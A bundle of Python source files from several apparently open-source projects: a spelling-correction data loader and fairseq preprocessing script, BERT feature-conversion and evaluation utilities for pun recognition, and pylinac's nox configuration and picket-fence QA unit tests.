def __init__(self, file_path):
self.data = json.load(open(file_path, 'r', encoding='utf-8'))
def __len__(self):
return len(self.data)
def __getitem__(self, index):
return self.data[index]['original_text'], self.data[index]['correct_text'], self.data[index]['wrong_ids']
def make_loaders(collate_fn, train_path='', valid_path='', test_path='',
batch_size=32, num_workers=4):
train_loader = None
if train_path and os.path.exists(train_path):
train_loader = DataLoader(CscDataset(train_path),
batch_size=batch_size,
shuffle=False,
num_workers=num_workers,
collate_fn=collate_fn)
valid_loader = None
if valid_path and os.path.exists(valid_path):
valid_loader = DataLoader(CscDataset(valid_path),
batch_size=batch_size,
num_workers=num_workers,
collate_fn=collate_fn)
test_loader = None
if test_path and os.path.exists(test_path):
test_loader = DataLoader(CscDataset(test_path),
batch_size=batch_size,
num_workers=num_workers,
collate_fn=collate_fn)
return train_loader, valid_loader, test_loader
```
#### File: pycorrector/transformer/preprocess.py
```python
import os
import sys
from codecs import open
from xml.dom import minidom
from sklearn.model_selection import train_test_split
sys.path.append('../..')
from pycorrector.utils.tokenizer import segment
from pycorrector.transformer import config
def parse_xml_file(path):
print('Parse data from %s' % path)
data_list = []
dom_tree = minidom.parse(path)
docs = dom_tree.documentElement.getElementsByTagName('DOC')
for doc in docs:
# Input the text
text = doc.getElementsByTagName('TEXT')[0]. \
childNodes[0].data.strip()
# Input the correct text
correction = doc.getElementsByTagName('CORRECTION')[0]. \
childNodes[0].data.strip()
source = segment(text.strip(), cut_type='char')
target = segment(correction.strip(), cut_type='char')
pair = [source, target]
if pair not in data_list:
data_list.append(pair)
return data_list
def save_data(data_list, src_data_path, trg_data_path):
with open(src_data_path, 'w', encoding='utf-8') as f1, \
open(trg_data_path, 'w', encoding='utf-8')as f2:
count = 0
for src, dst in data_list:
f1.write(' '.join(src) + '\n')
f2.write(' '.join(dst) + '\n')
count += 1
print("save line size:%d" % count)
def gen_fairseq_data(source_lang,
target_lang,
trainpref,
validpref,
nwordssrc,
nwordstgt,
destdir,
joined_dictionary
):
from fairseq import options
from fairseq_cli import preprocess
parser = options.get_preprocessing_parser()
args = parser.parse_args()
args.source_lang = source_lang
args.target_lang = target_lang
args.trainpref = trainpref
args.validpref = validpref
args.nwordssrc = nwordssrc
args.nwordstgt = nwordstgt
args.destdir = destdir
args.joined_dictionary = joined_dictionary
preprocess.main(args)
if __name__ == '__main__':
# if exist download big data, only generate fairseq data
if not os.path.exists(config.train_src_path):
# not exist big data, generate toy train data
data_list = []
for path in config.raw_train_paths:
data_list.extend(parse_xml_file(path))
train_lst, val_lst = train_test_split(data_list, test_size=0.1)
save_data(train_lst, config.train_src_path, config.train_trg_path)
save_data(val_lst, config.val_src_path, config.val_trg_path)
# generate fairseq format data with prepared train data
gen_fairseq_data(config.train_src_path.split('.')[-1],
config.train_trg_path.split('.')[-1],
config.trainpref,
config.valpref,
config.vocab_max_size,
config.vocab_max_size,
config.data_bin_dir,
config.joined_dictionary
)
``` |
{
"source": "joey1993/pun-recognition",
"score": 3
} |
#### File: joey1993/pun-recognition/bert_utils.py
```python
import csv
import logging
import sys
import numpy as np
import os
import random
import pickle
from sklearn.metrics import f1_score
from sklearn.metrics import recall_score
from sklearn.metrics import precision_score
import json
np.random.seed(2019)
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt = '%m/%d/%Y %H:%M:%S',
level = logging.INFO)
logger = logging.getLogger(__name__)
class InputExample(object):
"""A single training/test example for simple sequence classification."""
def __init__(self, guid, text_a, text_b=None, label=None, prons=None):
"""Constructs a InputExample.
Args:
guid: Unique id for the example.
text_a: string. The untokenized text of the first sequence. For single
sequence tasks, only this sequence must be specified.
text_b: (Optional) string. The untokenized text of the second sequence.
Only must be specified for sequence pair tasks.
label: (Optional) string. The label of the example. This should be
specified for train and dev examples, but not for test examples.
"""
self.guid = guid
self.text_a = text_a
self.text_b = text_b
self.label = label
self.prons = prons
class InputFeatures(object):
"""A single set of features of data."""
def __init__(self, input_ids, input_mask, segment_ids, label_id):
self.input_ids = input_ids
self.input_mask = input_mask
self.segment_ids = segment_ids
self.label_id = label_id
class InputPronFeatures(object):
"""A single set of features of data."""
def __init__(self, input_ids, input_mask, segment_ids, label_id, prons_id, prons_att_mask):
self.input_ids = input_ids
self.input_mask = input_mask
self.segment_ids = segment_ids
self.label_id = label_id
self.prons_id = prons_id
self.prons_att_mask = prons_att_mask
def readfile(filename):
'''
read file
return format :
[ ['EU', 'B-ORG'], ['rejects', 'O'], ['German', 'B-MISC'], ['call', 'O'], ['to', 'O'], ['boycott', 'O'], ['British', 'B-MISC'], ['lamb', 'O'], ['.', 'O'] ]
'''
f = open(filename,encoding='utf-8')
data = []
sentence = []
label= []
prons = []
for line in f:
if len(line)==0 or line.startswith('-DOCSTART') or line[0]=="\n":
if len(sentence) > 0:
data.append((sentence,label,prons))
sentence = []
label = []
prons = []
continue
splits = line.split(' ')
sentence.append(splits[0])
label.append(splits[-2])
prons.append(splits[-1][:-1].split(','))
if len(sentence) >0:
data.append((sentence,label,prons))
sentence = []
label = []
prons = []
return data
class DataProcessor(object):
"""Base class for data converters for sequence classification data sets."""
def get_train_examples(self, data_dir):
"""Gets a collection of `InputExample`s for the train set."""
raise NotImplementedError()
def get_dev_examples(self, data_dir):
"""Gets a collection of `InputExample`s for the dev set."""
raise NotImplementedError()
def get_labels(self):
"""Gets the list of labels for this data set."""
raise NotImplementedError()
@classmethod
def _read_csv(cls, input_file, quotechar=None):
"""Reads a tab separated value file."""
return readfile(input_file)
@classmethod
def _read_tsv(cls, input_file, quotechar=None):
"""Reads a tab separated value file."""
with open(input_file, "r", encoding='utf-8') as f:
reader = csv.reader(f, delimiter="\t", quotechar=quotechar)
lines = []
for line in reader:
if sys.version_info[0] == 2:
line = list(unicode(cell, 'utf-8') for cell in line)
lines.append(line)
return lines
class NerProcessor(DataProcessor):
"""Processor for the CoNLL-2003 data set."""
def get_train_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self._read_csv(os.path.join(data_dir, "train.txt")), "train")
def get_dev_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self._read_csv(os.path.join(data_dir, "valid.txt")), "dev")
def get_test_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self._read_csv(os.path.join(data_dir, "test.txt")), "test")
def get_labels(self):
#return ["O", "B-MISC", "I-MISC", "B-PER", "I-PER", "B-ORG", "I-ORG", "B-LOC", "I-LOC", "X", "[CLS]", "[SEP]"]
return ["O", "P", "X", "[CLS]", "[SEP]"]
def _create_examples(self,lines,set_type):
examples = []
for i,(sentence,label,prons) in enumerate(lines):
guid = "%s-%s" % (set_type, i)
text_a = ' '.join(sentence)
text_b = None
label = label
prons = prons
examples.append(InputExample(guid=guid,text_a=text_a,text_b=text_b,label=label,prons=prons))
return examples
class ScProcessor(DataProcessor):
"""Processor for the Sentence Classification data set."""
def get_train_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self._read_tsv(os.path.join(data_dir, "train.tsv")), "train")
def get_labels(self):
"""See base class."""
return ["0", "1"]
def _create_examples(self, lines, set_type):
"""Creates examples for the training and dev sets."""
examples = []
for (i, line) in enumerate(lines):
if i == 0:
continue
guid = "%s-%s" % (set_type, i)
text_a = line[1]
text_b = None
prons = line[2]
label = line[0]
if label == "-1": label = "0"
examples.append(InputExample(guid=guid, text_a=text_a, text_b=text_b, prons=prons, label=label))
return examples
processors = {"ner":NerProcessor,
"sc":ScProcessor}
def convert_examples_to_features(examples, label_list, max_seq_length, tokenizer):
"""Loads a data file into a list of `InputBatch`s."""
label_map = {label : i for i, label in enumerate(label_list,1)}
features = []
for (ex_index,example) in enumerate(examples):
textlist = example.text_a.split(' ')
labellist = example.label
tokens = []
labels = []
for i, word in enumerate(textlist):
token = tokenizer.tokenize(word)
tokens.extend(token)
label_1 = labellist[i]
for m in range(len(token)):
if m == 0:
labels.append(label_1)
else:
labels.append("X")
if len(tokens) >= max_seq_length - 1:
tokens = tokens[0:(max_seq_length - 2)]
labels = labels[0:(max_seq_length - 2)]
ntokens = []
segment_ids = []
label_ids = []
ntokens.append("[CLS]")
segment_ids.append(0)
label_ids.append(label_map["[CLS]"])
for i, token in enumerate(tokens):
ntokens.append(token)
segment_ids.append(0)
label_ids.append(label_map[labels[i]])
ntokens.append("[SEP]")
segment_ids.append(0)
label_ids.append(label_map["[SEP]"])
input_ids = tokenizer.convert_tokens_to_ids(ntokens)
input_mask = [1] * len(input_ids)
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
label_ids.append(0)
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
assert len(label_ids) == max_seq_length
if ex_index < 5:
logger.info("*** Example ***")
logger.info("guid: %s" % (example.guid))
logger.info("tokens: %s" % " ".join(
[str(x) for x in tokens]))
logger.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
logger.info("input_mask: %s" % " ".join([str(x) for x in input_mask]))
logger.info(
"segment_ids: %s" % " ".join([str(x) for x in segment_ids]))
# logger.info("label: %s (id = %d)" % (example.label, label_ids))
features.append(
InputFeatures(input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
label_id=label_ids))
return features
def convert_examples_to_pron_features(examples, label_list, max_seq_length, max_pron_length, tokenizer, prons_map):
"""Loads a data file into a list of `InputBatch`s."""
label_map = {label : i for i, label in enumerate(label_list,1)}
features = []
for (ex_index,example) in enumerate(examples):
textlist = example.text_a.split(' ')
labellist = example.label
pronslist = example.prons
tokens = []
labels = []
prons = []
prons_mask = []
for i, word in enumerate(textlist):
token = tokenizer.tokenize(word)
tokens.extend(token)
label_1 = labellist[i]
pron_1 = pronslist[i] # the complete prons of a word
pron_2 = [] # save the ids of prons of a word
for j in range(len(pron_1)):
index = len(prons_map) # expand the map with new prons
if pron_1[j] not in prons_map:
prons_map[pron_1[j]] = index + 1
pron_2.append(prons_map[pron_1[j]])
pron_mask_2 = [1] * len(pron_2)
if len(pron_2) >= max_pron_length:
pron_2 = pron_2[0:max_pron_length] # trunk it if too long
pron_mask_2 = pron_mask_2[0:max_pron_length]
else:
pron_2 += [0] * (max_pron_length - len(pron_2)) # pad it if too short
pron_mask_2 += [0] * (max_pron_length - len(pron_mask_2))
for m in range(len(token)):
if m == 0:
labels.append(label_1)
prons.append(pron_2) # only send the prons to the first piece_token of a word
prons_mask.append(pron_mask_2)
else:
labels.append("X")
prons.append([0] * max_pron_length) # pad other piece_token with 0's
prons_mask.append([0] * max_pron_length)
if len(tokens) >= max_seq_length - 1:
tokens = tokens[0:(max_seq_length - 2)]
labels = labels[0:(max_seq_length - 2)]
prons = prons[0:(max_seq_length - 2)]
prons_mask = prons_mask[0:(max_seq_length - 2)]
ntokens = []
segment_ids = []
label_ids = []
prons_ids = []
prons_att_mask = []
ntokens.append("[CLS]")
segment_ids.append(0)
label_ids.append(label_map["[CLS]"])
prons_ids.append([0] * max_pron_length) # pad the cls with 0's
prons_att_mask.append([0] * max_pron_length)
for i, token in enumerate(tokens):
ntokens.append(token)
segment_ids.append(0)
label_ids.append(label_map[labels[i]])
prons_ids.append(prons[i])
prons_att_mask.append(prons_mask[i])
ntokens.append("[SEP]")
segment_ids.append(0)
label_ids.append(label_map["[SEP]"])
prons_ids.append([0] * max_pron_length) # pad the sep with 0's
prons_att_mask.append([0] * max_pron_length)
input_ids = tokenizer.convert_tokens_to_ids(ntokens)
input_mask = [1] * len(input_ids)
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
label_ids.append(0)
prons_ids.append([0] * max_pron_length)
prons_att_mask.append([0] * max_pron_length)
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
assert len(label_ids) == max_seq_length
assert len(prons_ids) == max_seq_length
assert len(prons_att_mask) == max_seq_length
if ex_index < 0:
logger.info("*** Example ***")
logger.info("guid: %s" % (example.guid))
logger.info("tokens: %s" % " ".join(
[str(x) for x in tokens]))
logger.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
logger.info("input_mask: %s" % " ".join([str(x) for x in input_mask]))
logger.info("segment_ids: %s" % " ".join([str(x) for x in segment_ids]))
logger.info("label_ids: %s" % " ".join([str(x) for x in label_ids]))
logger.info("prons_ids: %s" % " ".join([str(x) for x in prons_ids]))
logger.info("prons_att_mask: %s" % " ".join([str(x) for x in prons_att_mask]))
logger.info("prons_map: %s" % str(prons_map))
# logger.info("label: %s (id = %d)" % (example.label, label_ids))
features.append(
InputPronFeatures(input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
label_id=label_ids,
prons_id=prons_ids,
prons_att_mask=prons_att_mask))
return features, prons_map
def convert_examples_to_pron_SC_features(examples, label_list, max_seq_length, max_pron_length, tokenizer, prons_map):
"""Loads a data file into a list of `InputBatch`s."""
label_map = {label : i for i, label in enumerate(label_list)}
print(label_map)
features = []
for (ex_index,example) in enumerate(examples):
textlist = example.text_a.split(' ')
label_ids = label_map[example.label]
pronslist = [x.split(',') for x in example.prons.split(' ')]
#assert(len(textlist) == len(pronslist))
if len(textlist) != len(pronslist):
print(textlist)
print(pronslist)
sys.exit()
tokens = []
prons = []
prons_mask = []
for i, word in enumerate(textlist):
token = tokenizer.tokenize(word)
tokens.extend(token)
pron_1 = pronslist[i] # the complete prons of a word
pron_2 = [] # save the ids of prons of a word
for j in range(len(pron_1)):
index = len(prons_map) # expand the map with new prons
if pron_1[j] not in prons_map:
prons_map[pron_1[j]] = index + 1
pron_2.append(prons_map[pron_1[j]])
pron_mask_2 = [1] * len(pron_2)
if len(pron_2) >= max_pron_length:
pron_2 = pron_2[0:max_pron_length] # trunk it if too long
pron_mask_2 = pron_mask_2[0:max_pron_length]
else:
pron_2 += [0] * (max_pron_length - len(pron_2)) # pad it if too short
pron_mask_2 += [0] * (max_pron_length - len(pron_mask_2))
for m in range(len(token)):
if m == 0:
prons.append(pron_2) # only send the prons to the first piece_token of a word
prons_mask.append(pron_mask_2)
else:
prons.append([0] * max_pron_length) # pad other piece_token with 0's
prons_mask.append([0] * max_pron_length)
if len(tokens) >= max_seq_length - 1:
tokens = tokens[0:(max_seq_length - 2)]
prons = prons[0:(max_seq_length - 2)]
prons_mask = prons_mask[0:(max_seq_length - 2)]
ntokens = []
segment_ids = []
prons_ids = []
prons_att_mask = []
ntokens.append("[CLS]")
segment_ids.append(0)
prons_ids.append([0] * max_pron_length) # pad the cls with 0's
prons_att_mask.append([0] * max_pron_length)
for i, token in enumerate(tokens):
ntokens.append(token)
segment_ids.append(0)
prons_ids.append(prons[i])
prons_att_mask.append(prons_mask[i])
ntokens.append("[SEP]")
segment_ids.append(0)
prons_ids.append([0] * max_pron_length) # pad the sep with 0's
prons_att_mask.append([0] * max_pron_length)
input_ids = tokenizer.convert_tokens_to_ids(ntokens)
input_mask = [1] * len(input_ids)
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
prons_ids.append([0] * max_pron_length)
prons_att_mask.append([0] * max_pron_length)
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
assert len(prons_ids) == max_seq_length
assert len(prons_att_mask) == max_seq_length
if ex_index < 3:
logger.info("*** Example ***")
logger.info("guid: %s" % (example.guid))
logger.info("tokens: %s" % " ".join([str(x) for x in tokens]))
logger.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
logger.info("input_mask: %s" % " ".join([str(x) for x in input_mask]))
#logger.info("segment_ids: %s" % " ".join([str(x) for x in segment_ids]))
logger.info("prons_ids: %s" % " ".join([str(x) for x in prons_ids]))
logger.info("label: %s (id = %d)" % (example.label, label_ids))
# logger.info("label: %s (id = %d)" % (example.label, label_ids))
features.append(
InputPronFeatures(input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
label_id=label_ids,
prons_id=prons_ids,
prons_att_mask=prons_att_mask))
return features, prons_map
def embed_load(file_input):
f = open(file_input, 'r')
line = f.readline()
pron_map = {}
num,dim = line.rstrip().split(' ')
line = f.readline()
embeddings = [[0.0]*int(dim)]
while line != '':
vec = line.rstrip().split(' ')
token = vec[0]
emb = vec[1:]
if token not in pron_map:
pron_map[token] = len(pron_map) + 1
embeddings.append([float(x) for x in emb])
line = f.readline()
return pron_map, embeddings
def embed_extend(embeddings, length):
dim = len(embeddings[0])
for i in range(length+1-len(embeddings)):
embeddings.append(np.random.random([dim])*2-1)
return embeddings
def write_scores(file_output, y):
with open(file_output, 'wb') as f:
pickle.dump(y, f)
def f1_2d(tmp2, tmp1):
return f1_score(tmp2, tmp1), recall_score(tmp2,tmp1), precision_score(tmp2,tmp1)
def visualize_local(logits, label_ids, input_ids, prons_ids, prons_att_mask, att, label_map, prons_map, tokenizer):
"""
torch.Size([8, 128])
torch.Size([8, 128])
torch.Size([8, 128])
torch.Size([8, 128, 5])
torch.Size([8, 128, 5])
torch.Size([8, 128, 5])
"""
prons_map = {int(prons_map[pron]): pron for pron in prons_map}
f = open('results/pron_viz.json', 'a')
results = {}
for i in range(len(label_ids)):
for j in range(len(label_ids[i])):
ran = random.random()
if label_ids[i][j] != 0 and label_map[label_ids[i][j]] == label_map[logits[i][j]] and label_map[label_ids[i][j]] == "P":
mask = prons_att_mask[i][j]
score = att[i][j]
tmp = tokenizer.convert_ids_to_tokens(input_ids[i])
try:
N = tmp.index('[PAD]')
results['sent'] = tmp[:N]
except:
result['sent'] = tmp
results['start'] = tokenizer.convert_ids_to_tokens([int(input_ids[i][j])])[0]
results['pron'] = {}
for k,m in enumerate(mask):
if m == 0: break
results['pron'][prons_map[prons_ids[i][j][k]]] = float(score[k])
json.dump(results, f)
f.write('\n')
return
def visualize_self(logits, label_ids, input_ids, input_mask, att, tokenizer):
"""
torch.Size(8)
torch.Size(8)
torch.Size([8, 128])
torch.Size([8, 128, 128])
"""
f = open('results/token_viz.json', 'a')
results = {}
for i in range(len(input_ids)):
if label_ids[i] == logits[i] and label_ids[i] == 1:
try:
N = input_mask[i].index(0)
ids = input_ids[:N]
except:
ids = input_ids
tokens = tokenizer.convert_ids_to_tokens(input_ids[i])
results['sent_'+str(i)] = tokens
for j in range(len(tokens)):
results[token +'_'+ str(j)] = att[i][j]
json.dump(results, f)
f.write('\n')
return
```
#### File: joey1993/pun-recognition/cv_eval_sc.py
```python
import pickle
import sys
from bert_utils import f1_2d
def main(argv):
file_dir = argv[1]
cv = int(argv[2])
preds,truths = [], []
for i in range(cv):
with open(file_dir+"pred_"+str(i), 'rb') as f:
pred = pickle.load(f)
preds.extend(pred)
with open(file_dir+"true_"+str(i), 'rb') as f:
true = pickle.load(f)
truths.extend(true)
assert (len(preds) == len(truths))
f1, recall, precision = f1_2d(truths, preds)
return "precision, recall, f1: {}, {}, {}".format(precision*100, recall*100, f1*100)
if __name__ == "__main__":
print(main(sys.argv))
```
#### File: semeval2017/data_with_pronunciation/parse_xml_pl.py
```python
import xml.etree.ElementTree as ET
import sys
import csv
import random
def read_xml(input_file):
tree = ET.parse(input_file)
root = tree.getroot()
original_sentences,text_ids = [],[]
for child in root:
original_sentence = []
text_id = child.attrib['id']
for i in range(len(child)):
original_sentence.append(child[i].text)
original_sentences.append(original_sentence)
text_ids.append(text_id)
return original_sentences,text_ids
def read_labels(input_file):
labels,label_ids = [], []
with open(input_file, "r") as f:
contents = f.readlines()
for line in contents:
vec = line.strip().split('\t')
label_ids.append(vec[0])
labels.append(vec[1])
return labels,label_ids
def write_ner(sent, tag, pron, f):
index = int(tag.split('_')[-1])
for i in range(len(sent)):
prons = ','.join(pron[i].split(' '))#.encode('utf-8')
sents = sent[i]#.encode('utf-8')
if index == i + 1:
f.write(sents + ' ' + 'P' + ' ' + prons + '\n')
else:
f.write(sents + ' ' + 'O' + ' ' + prons + '\n')
f.write('\n')
def main(argv):
sents,ids1 = read_xml(argv[1])
labs,ids2 = read_labels(argv[2])
prons,ids3 = read_xml(argv[3])
output = argv[4]
assert (ids1 == ids2)
assert (ids2 == ids3)
#file_name = argv[1].replace('.xml','')
#with open(file_name, 'w') as f:
# writer = csv.writer(f, delimiter='\t')
# for i in range(len(sents)):
# writer.writerow([str(labs[i]),str(' '.join(sents[i]))])
train = open(output+'train.txt','w')
test = open(output+'test.txt','w')
dev = open(output+'valid.txt', 'w')
for i in range(len(sents)):
print(sents[i])
write_ner(sents[i], labs[i], prons[i], train)
#num = random.random()
#if num < 0.1:
# write_ner(sents[i], labs[i], prons[i], dev)
# #dev.write(sent)
#elif num < 0.2:
# write_ner(sents[i], labs[i], prons[i], test)
# #test.write(sent)
#else:
# write_ner(sents[i], labs[i], prons[i], train)
# #train.write(sent)
if __name__ == "__main__":
main(sys.argv)
``` |
{
"source": "joey5656/pylinac",
"score": 2
} |
#### File: joey5656/pylinac/noxfile.py
```python
import nox
@nox.session(python=['3.6', '3.9'], reuse_venv=False)
def run_tests(session):
session.install('-r', 'requirements-dev.txt')
session.run("pytest", '-n', '5')
@nox.session(reuse_venv=False)
def serve_docs(session):
session.install('sphinx')
session.install('sphinx-autobuild')
session.install('matplotlib')
session.run("sphinx-autobuild", "docs/source", "docs/build", "--port", "8777")
```
#### File: pylinac/tests_basic/test_picketfence.py
```python
import io
import os
import os.path as osp
import tempfile
from unittest import TestCase, skip
import matplotlib.pyplot as plt
from pylinac.core import image
from pylinac.picketfence import PicketFence, Orientation, PFResult, MLCArrangement
from tests_basic.utils import save_file, CloudFileMixin, get_file_from_cloud_test_repo, InitTesterMixin, \
FromURLTesterMixin, FromDemoImageTesterMixin
TEST_DIR = 'picket_fence'
class TestInstantiation(TestCase, InitTesterMixin, FromURLTesterMixin, FromDemoImageTesterMixin):
klass = PicketFence
init_file = ['picket_fence', 'AS500_PF.dcm']
url = 'EPID-PF-LR.dcm'
def test_filter_on_load(self):
PicketFence(self.full_init_file, filter=3) # shouldn't raise
def test_load_with_log(self):
log_file = get_file_from_cloud_test_repo([TEST_DIR, 'PF_log.bin'])
pf_file = get_file_from_cloud_test_repo([TEST_DIR, 'PF.dcm'])
pf = PicketFence(pf_file, log=log_file)
pf.analyze()
def test_load_from_file_object(self):
pf_file = get_file_from_cloud_test_repo([TEST_DIR, 'PF.dcm'])
ref_pf = PicketFence(pf_file)
ref_pf.analyze()
with open(pf_file, "rb") as f:
pf = PicketFence(f)
pf.analyze()
self.assertIsInstance(pf, PicketFence)
self.assertEqual(pf.percent_passing, ref_pf.percent_passing)
def test_load_from_stream(self):
pf_file = get_file_from_cloud_test_repo([TEST_DIR, 'PF.dcm'])
ref_pf = PicketFence(pf_file)
ref_pf.analyze()
with open(pf_file, "rb") as f:
s = io.BytesIO(f.read())
pf = PicketFence(s)
pf.analyze()
self.assertIsInstance(pf, PicketFence)
self.assertEqual(pf.percent_passing, ref_pf.percent_passing)
def test_custom_MLC_arrangement(self):
mlc_setup = MLCArrangement(leaf_arrangement=[(10, 10), (40, 5), (10, 10)])
# pass it in to the mlc parameter
path = get_file_from_cloud_test_repo([TEST_DIR, 'AS500_PF.dcm'])
pf = PicketFence(path, mlc=mlc_setup)
# shouldn't raise
pf.analyze()
pf.results()
pf.results_data()
def test_mlc_string(self):
mlc_setup = 'Millennium'
# pass it in to the mlc parameter
path = get_file_from_cloud_test_repo([TEST_DIR, 'AS500_PF.dcm'])
pf = PicketFence(path, mlc=mlc_setup)
# shouldn't raise
pf.analyze()
pf.results()
pf.results_data()
def test_image_kwargs(self):
path = get_file_from_cloud_test_repo([TEST_DIR, 'AS500_PF.dcm'])
# do normal analysis
phan = PicketFence(path)
phan.analyze()
offset = phan.results_data().offsets_from_cax_mm[0]
# pass kwarg; use same dpi as image; CAX offset should be the same, would be different with different DPI
img = image.load(path)
phan = PicketFence(path, image_kwargs={'dpi': img.dpi})
phan.analyze()
offset_manual_dpi = phan.results_data().offsets_from_cax_mm[0]
self.assertEqual(offset, offset_manual_dpi)
class TestAnalyze(TestCase):
@classmethod
def setUpClass(cls):
cls.pf = PicketFence.from_demo_image()
cls.pf.analyze()
def test_bad_tolerance_values(self):
self.assertRaises(ValueError, self.pf.analyze, 0.2, 0.3)
def test_demo(self):
PicketFence.run_demo()
def test_publish_pdf(self):
with tempfile.NamedTemporaryFile(delete=False) as t:
self.pf.publish_pdf(t.name, notes="stuff", metadata={"Unit": "TB1"})
os.remove(t.name)
def test_results_data(self):
data = self.pf.results_data()
self.assertIsInstance(data, PFResult)
self.assertEqual(data.max_error_mm, self.pf.max_error)
data_dict = self.pf.results_data(as_dict=True)
self.assertIsInstance(data_dict, dict)
self.assertIn("pylinac_version", data_dict)
def test_no_measurements_suggests_inversion(self):
file_loc = get_file_from_cloud_test_repo([TEST_DIR, 'noisy-FFF-wide-gap-pf.dcm'])
pf = PicketFence(file_loc)
pf.image.invert()
with self.assertRaises(ValueError):
pf.analyze(invert=False)
def test_orientation_passing_as(self):
# below shouldn't raise
# as enum
pf = PicketFence.from_demo_image()
pf.analyze(orientation=Orientation.UP_DOWN)
# as str
pf = PicketFence.from_demo_image()
pf.analyze(orientation="Up-Down")
def test_histogram(self):
pf = PicketFence.from_demo_image()
pf.analyze()
pf.plot_histogram()
pf2 = PicketFence.from_demo_image()
# can't plot before analyzing
with self.assertRaises(ValueError):
pf2.plot_histogram()
def test_failed_leaves_before_analyzed(self):
pf = PicketFence.from_demo_image()
with self.assertRaises(ValueError):
pf.failed_leaves()
def test_failed_leaves_traditional(self):
pf = PicketFence.from_demo_image()
pf.analyze(separate_leaves=False, tolerance=0.05)
self.assertEqual(
set(pf.failed_leaves()),
{12, 14, 16, 17, 18, 19, 26, 29, 31, 32, 33, 35, 39, 42, 43, 47},
)
def test_failed_leaves_separate(self):
pf = PicketFence.from_demo_image()
pf.analyze(separate_leaves=True, tolerance=0.15, nominal_gap_mm=3)
self.assertEqual(
set(pf.failed_leaves()),
{
"A12",
"B12",
"A13",
"B13",
"A14",
"B14",
"A15",
"B15",
"B16",
"B17",
"A18",
"B18",
"B19",
"A19",
"A20",
"B20",
"B22",
"A23",
"B23",
"A24",
"B24",
"A25",
"B26",
"A27",
"B27",
"A28",
"B28",
"B29",
"B30",
"B31",
"A32",
"B32",
"A33",
"B34",
"B35",
"A35",
"A36",
"B36",
"A37",
"B37",
"A38",
"B38",
"B39",
"A39",
"A40",
"B40",
"B41",
"A41",
"B42",
"A43",
"B43",
"B44",
"A44",
"B45",
"A45",
"A46",
"B46",
"B47",
"A47",
},
)
class TestPlottingSaving(TestCase):
@classmethod
def setUpClass(cls):
cls.pf = PicketFence.from_demo_image()
cls.pf.analyze()
cls.pf_updown = PicketFence.from_demo_image()
cls.pf_updown.image.rot90()
cls.pf_updown.analyze()
@classmethod
def tearDownClass(cls):
plt.close("all")
def test_plotting(self):
self.pf.plot_analyzed_image()
self.pf_updown.plot_analyzed_image()
def test_saving_image(self):
save_file(self.pf.save_analyzed_image)
save_file(self.pf_updown.save_analyzed_image)
def test_publish_pdf(self):
with tempfile.NamedTemporaryFile(delete=False) as t:
self.pf.publish_pdf(t.name, notes='stuff', metadata={'Unit': 'TB1'})
os.remove(t.name)
def test_results_data(self):
data = self.pf.results_data()
self.assertIsInstance(data, PFResult)
self.assertEqual(data.max_error_mm, self.pf.max_error)
data_dict = self.pf.results_data(as_dict=True)
self.assertIsInstance(data_dict, dict)
self.assertIn('pylinac_version', data_dict)
def test_plot_histogram(self):
self.pf.plot_histogram()
def test_save_histogram(self):
# to disk
save_file(self.pf.save_histogram)
# to binary stream
save_file(self.pf.save_histogram, as_file_object='b')
def test_plot_leaf_profile(self):
self.pf.plot_leaf_profile(20, 3)
def test_save_leaf_profile(self):
# to disk
save_file(self.pf.save_leaf_profile, 20, 3)
# to binary stream
save_file(self.pf.save_leaf_profile, 20, 3, as_file_object='b')
class PFTestMixin(CloudFileMixin):
"""Base Mixin for testing a picketfence image."""
dir_path = ['picket_fence']
picket_orientation = Orientation.UP_DOWN
mlc = "Millennium"
num_pickets = 10
pass_num_pickets = False
percent_passing = 100
max_error = 0
abs_median_error = 0
sag_adjustment = 0
invert = False
passes = True
log = None
mean_picket_spacing = 15
separate_leaves = False
nominal_gap_mm = 1
mlc_skew = 0
max_error_picket = None
max_error_leaf = None
@classmethod
def get_logfile(cls):
"""Return the canonical path to the log file."""
if cls.log is not None:
return osp.join(*cls.dir_path, *cls.log)
@classmethod
def setUpClass(cls):
cls.pf = PicketFence(cls.get_filename(), log=cls.get_logfile())
if cls.pass_num_pickets:
cls.pf.analyze(
sag_adjustment=cls.sag_adjustment,
num_pickets=cls.num_pickets,
invert=cls.invert,
separate_leaves=cls.separate_leaves,
nominal_gap_mm=cls.nominal_gap_mm,
)
else:
cls.pf.analyze(
sag_adjustment=cls.sag_adjustment,
invert=cls.invert,
separate_leaves=cls.separate_leaves,
nominal_gap_mm=cls.nominal_gap_mm,
)
def test_passed(self):
self.assertEqual(self.pf.passed, self.passes)
def test_picket_orientation(self):
self.assertEqual(self.pf.orientation, self.picket_orientation)
def test_num_pickets(self):
self.assertEqual(self.pf.num_pickets, self.num_pickets)
def test_percent_passing(self):
self.assertAlmostEqual(self.pf.percent_passing, self.percent_passing, delta=1)
def test_max_error(self):
self.assertAlmostEqual(self.pf.max_error, self.max_error, delta=0.1)
def test_abs_median_error(self):
self.assertAlmostEqual(
self.pf.abs_median_error, self.abs_median_error, delta=0.05
)
def test_picket_spacing(self):
self.assertAlmostEqual(
self.pf.mean_picket_spacing, self.mean_picket_spacing, delta=0.5
)
def test_mlc_skew(self):
self.assertAlmostEqual(self.pf.mlc_skew(), self.mlc_skew, delta=0.3)
def test_max_picket(self):
if self.max_error_picket:
self.assertEqual(self.pf.max_error_picket, self.max_error_picket)
def test_max_leaf(self):
if self.max_error_leaf:
